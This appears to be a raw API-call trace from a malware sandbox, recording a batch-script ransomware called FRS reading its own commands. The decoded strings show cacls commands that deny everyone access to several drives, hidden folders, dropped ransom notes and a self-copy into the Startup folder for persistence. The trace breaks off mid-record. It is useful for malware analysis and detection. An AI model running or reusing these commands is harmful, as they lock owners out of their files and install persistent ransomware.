SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0112.342] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.342] GetFileType (hFile=0x2b8) returned 0x1 [0112.342] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0112.342] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0112.343] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0112.343] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.343] GetFileType (hFile=0x2b8) returned 0x1 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0112.343] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0112.343] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0112.343] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.343] GetFileType (hFile=0x2b8) returned 0x1 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0112.343] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0112.343] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0112.343] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.343] GetFileType (hFile=0x2b8) returned 0x1 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0112.343] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0112.343] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0112.343] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.343] GetFileType (hFile=0x2b8) returned 0x1 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0112.343] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.343] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0112.343] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0112.344] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.344] GetFileType (hFile=0x2b8) returned 0x1 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0112.344] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0112.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0112.344] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.344] GetFileType (hFile=0x2b8) returned 0x1 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0112.344] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0112.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0112.344] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.344] GetFileType (hFile=0x2b8) returned 0x1 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0112.344] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0112.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0112.344] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.344] GetFileType (hFile=0x2b8) returned 0x1 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0112.344] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0112.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0112.344] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.344] GetFileType (hFile=0x2b8) returned 0x1 [0112.344] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0112.345] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0112.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0112.345] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.345] GetFileType (hFile=0x2b8) returned 0x1 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0112.345] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0112.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0112.345] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.345] GetFileType (hFile=0x2b8) returned 0x1 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0112.345] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0112.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0112.345] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.345] GetFileType (hFile=0x2b8) returned 0x1 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0112.345] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0112.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0112.345] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.345] GetFileType (hFile=0x2b8) returned 0x1 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0112.345] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.345] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0112.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0112.346] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.346] GetFileType (hFile=0x2b8) returned 0x1 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0112.346] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0112.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0112.346] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.346] GetFileType (hFile=0x2b8) returned 0x1 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0112.346] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0112.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0112.346] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.346] GetFileType (hFile=0x2b8) returned 0x1 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0112.346] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0112.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0112.346] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.346] GetFileType (hFile=0x2b8) returned 0x1 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0112.346] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0112.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0112.346] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0112.347] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.347] GetFileType (hFile=0x2b8) returned 0x1 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0112.347] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0112.347] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0112.347] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.347] GetFileType (hFile=0x2b8) returned 0x1 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0112.347] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0112.347] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0112.347] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.347] GetFileType (hFile=0x2b8) returned 0x1 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0112.347] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0112.347] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0112.347] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.347] GetFileType (hFile=0x2b8) returned 0x1 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0112.347] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0112.347] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0112.347] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0112.347] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.347] GetFileType (hFile=0x2b8) returned 0x1 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0112.348] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0112.348] MultiByteToWideChar (in: CodePage=0x1b5, 